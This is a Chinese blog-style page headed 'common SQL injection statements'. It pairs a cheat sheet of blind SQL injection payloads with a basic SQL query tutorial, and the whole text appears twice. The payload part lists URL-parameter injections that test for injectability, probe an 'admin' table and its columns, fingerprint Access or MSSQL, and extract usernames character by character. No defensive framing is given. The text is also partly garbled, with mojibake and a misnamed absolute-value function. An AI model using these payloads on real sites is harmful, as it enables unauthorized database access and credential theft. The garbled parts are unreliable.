常用sql注入語句
阿新 • • 發佈:2019-01-31
檢測可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常頁面)
http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面)
檢測表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)
檢測欄位的
http://127.0.0.1/xx?id=11 and exists (select username from admin)
檢測ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測是否為MSSQL資料庫
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
檢測是否為英文
(ACCESS資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
檢測英文的範圍
(ACCESS資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
檢測那個字元
(ACCESS資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
常用函式
Access:asc(字元) SQLServer:unicode(字元)
作用:返回某字元的ASCII碼
Access:chr(數字) SQLServer:nchar(數字)
作用:與asc相反,根據ASCII碼返回字元
Access:mid(字串,N,L) SQLServer:substring(字串,N,L)
作用:返回字串從N個字元起長度為L的子字串,即N到N+L之間的字串
Access:abc(數字) SQLServer:abc (數字)
作用:返回數字的絕對值(在猜解漢字的時候會用到)
Access:A between B And C SQLServer:A between B And C
作用:判斷A是否界於B與C之間
and exists(Select top 1 * From 使用者 order by id)
1.在查詢結果中顯示列名:
a.用as關鍵字:select name as ’姓名’ from students order by age
b.直接表示:select name ’姓名’ from students order by age
2.精確查詢:
a.用in限定範圍:select * from students where native in (’湖南’, ’四川’)
b.between...and:select * from students where age between 20 and 30
c.“=”:select * from students where name = ’李山’
d.like:select * from students where name like ’李%’ (注意查詢條件中有“%”,則說明是部分匹配,而且還有先後資訊在裡面,即查詢以“李”開頭的匹配項。所以若查詢有“李”的所有物件,應該命令:’%李%’;若是第二個字為李,則應為’_李%’或’_李’或’_李_’。)
e.[]匹配檢查符:select * from courses where cno like ’[AC]%’ (表示或的關係,與"in(...)"類似,而且"[]"可以表示範圍,如:select * from courses where cno like ’[A-C]%’)
3.對於時間型別變數的處理
a.smalldatetime:直接按照字串處理的方式進行處理,例如:select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’
4.集函式
a.count()求和,如:select count(*) from students (求學生總人數)
b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’
c.max(列)和min(列),求最大與最小
5.分組group
常用於統計時,如分組查總數:select gender,count(sno) from students group by gender(檢視男女學生各有多少)
注意:從哪種角度分組就從哪列"group by"
對於多重分組,只需將分組規則羅列。比如查詢各屆各專業的男女同學人數 ,那麼分組規則有:屆別(grade)、專業(mno)和
性別(gender),所以有"group by grade, mno, gender"
select grade, mno, gender, count(*) from students group by grade, mno, gender
通常group還和having聯用,比如查詢1門課以上不及格的學生,則按學號(sno)分類有:
select sno,count(*) from grades where mark<60 group by sno having count(*)>1
6.UNION聯合
合併查詢結果,如:
Select * FROM students Where name like ‘張%’UNION [ALL] Select * FROM students Where name like ‘李%’
7.多表查詢
a.內連線
select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno
(注意可以引用別名)
b.外連線
b1.左連線
select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno
左連線特點:顯示全部左邊表中的所有專案,即使其中有些項中的資料未填寫完全。
左外連線返回那些存在於左表而右表中卻沒有的行,再加上內連線的行。
b2.右連線
與左連線類似
b3.全連線
select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno
兩邊表中的內容全部顯示
c.自身連線
select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno
採用別名解決問題。
d.交*連線
select lastname+firstname from lastname CROSS JOIN firstanme
相當於做笛卡兒積
8.巢狀查詢
a.用關鍵字IN,如查詢豬豬山的同鄉:
select * from students where native in (select native from students where name=’豬豬’)
b.使用關鍵字EXIST,比如,下面兩句是等價的:
select * from students where sno in (select sno from grades where cno=’B2’)
select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)
9.關於排序order
a.對於排序order,有兩種方法:asc升序和desc降序
b.對於排序order,可以按照查詢條件中的某項排列,而且這項可用數字表示,如:
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3
10.其他
a.對於有空格的識別名稱,應該用"[]"括住。
b.對於某列中沒有資料的特定查詢可以用null判斷,如select sno,courseno from grades where mark IS NULL
c.注意區分在巢狀查詢中使用的any與all的區別,any相當於邏輯運算“||”而all則相當於邏輯運算“&&”
d.注意在做否定意義的查詢是小心進入陷阱:
如,沒有選修‘B2’課程的學生 :
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’
上面的查詢方式是錯誤的,正確方式見下方:
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno=’B2’)
11.關於有難度多重巢狀查詢的解決思想:如,選修了全睝@緯痰難 ?br>select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))
最外一重:從學生表中選,排除那些有課沒選的。用not exist。由於討論物件是課程,所以第二重查詢從course表中找,排除那些選了課的即可
http://127.0.0.1/xx?id=11 and 1=1 (正常頁面)
http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面)
檢測表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)
檢測欄位的
http://127.0.0.1/xx?id=11 and exists (select username from admin)
檢測ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測是否為MSSQL資料庫
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
檢測是否為英文
(ACCESS資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
檢測英文的範圍
(ACCESS資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
檢測那個字元
(ACCESS資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL資料庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
常用函式
Access:asc(字元) SQLServer:unicode(字元)
作用:返回某字元的ASCII碼
Access:chr(數字) SQLServer:nchar(數字)
作用:與asc相反,根據ASCII碼返回字元
Access:mid(字串,N,L) SQLServer:substring(字串,N,L)
作用:返回字串從N個字元起長度為L的子字串,即N到N+L之間的字串
Access:abc(數字) SQLServer:abc (數字)
作用:返回數字的絕對值(在猜解漢字的時候會用到)
Access:A between B And C SQLServer:A between B And C
作用:判斷A是否界於B與C之間
and exists(Select top 1 * From 使用者 order by id)
1.在查詢結果中顯示列名:
a.用as關鍵字:select name as ’姓名’ from students order by age
b.直接表示:select name ’姓名’ from students order by age
2.精確查詢:
a.用in限定範圍:select * from students where native in (’湖南’, ’四川’)
b.between...and:select * from students where age between 20 and 30
c.“=”:select * from students where name = ’李山’
d.like:select * from students where name like ’李%’ (注意查詢條件中有“%”,則說明是部分匹配,而且還有先後資訊在裡面,即查詢以“李”開頭的匹配項。所以若查詢有“李”的所有物件,應該命令:’%李%’;若是第二個字為李,則應為’_李%’或’_李’或’_李_’。)
e.[]匹配檢查符:select * from courses where cno like ’[AC]%’ (表示或的關係,與"in(...)"類似,而且"[]"可以表示範圍,如:select * from courses where cno like ’[A-C]%’)
3.對於時間型別變數的處理
a.smalldatetime:直接按照字串處理的方式進行處理,例如:select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’
4.集函式
a.count()求和,如:select count(*) from students (求學生總人數)
b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’
c.max(列)和min(列),求最大與最小
5.分組group
常用於統計時,如分組查總數:select gender,count(sno) from students group by gender(檢視男女學生各有多少)
注意:從哪種角度分組就從哪列"group by"
對於多重分組,只需將分組規則羅列。比如查詢各屆各專業的男女同學人數 ,那麼分組規則有:屆別(grade)、專業(mno)和
性別(gender),所以有"group by grade, mno, gender"
select grade, mno, gender, count(*) from students group by grade, mno, gender
通常group還和having聯用,比如查詢1門課以上不及格的學生,則按學號(sno)分類有:
select sno,count(*) from grades where mark<60 group by sno having count(*)>1
6.UNION聯合
合併查詢結果,如:
Select * FROM students Where name like ‘張%’UNION [ALL] Select * FROM students Where name like ‘李%’
7.多表查詢
a.內連線
select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno
(注意可以引用別名)
b.外連線
b1.左連線
select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno
左連線特點:顯示全部左邊表中的所有專案,即使其中有些項中的資料未填寫完全。
左外連線返回那些存在於左表而右表中卻沒有的行,再加上內連線的行。
b2.右連線
與左連線類似
b3.全連線
select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno
兩邊表中的內容全部顯示
c.自身連線
select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno
採用別名解決問題。
d.交*連線
select lastname+firstname from lastname CROSS JOIN firstanme
相當於做笛卡兒積
8.巢狀查詢
a.用關鍵字IN,如查詢豬豬山的同鄉:
select * from students where native in (select native from students where name=’豬豬’)
b.使用關鍵字EXIST,比如,下面兩句是等價的:
select * from students where sno in (select sno from grades where cno=’B2’)
select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)
9.關於排序order
a.對於排序order,有兩種方法:asc升序和desc降序
b.對於排序order,可以按照查詢條件中的某項排列,而且這項可用數字表示,如:
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3
10.其他
a.對於有空格的識別名稱,應該用"[]"括住。
b.對於某列中沒有資料的特定查詢可以用null判斷,如select sno,courseno from grades where mark IS NULL
c.注意區分在巢狀查詢中使用的any與all的區別,any相當於邏輯運算“||”而all則相當於邏輯運算“&&”
d.注意在做否定意義的查詢是小心進入陷阱:
如,沒有選修‘B2’課程的學生 :
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’
上面的查詢方式是錯誤的,正確方式見下方:
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno=’B2’)
11.關於有難度多重巢狀查詢的解決思想:如,選修了全睝@緯痰難 ?br>select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))
最外一重:從學生表中選,排除那些有課沒選的。用not exist。由於討論物件是課程,所以第二重查詢從course表中找,排除那些選了課的即可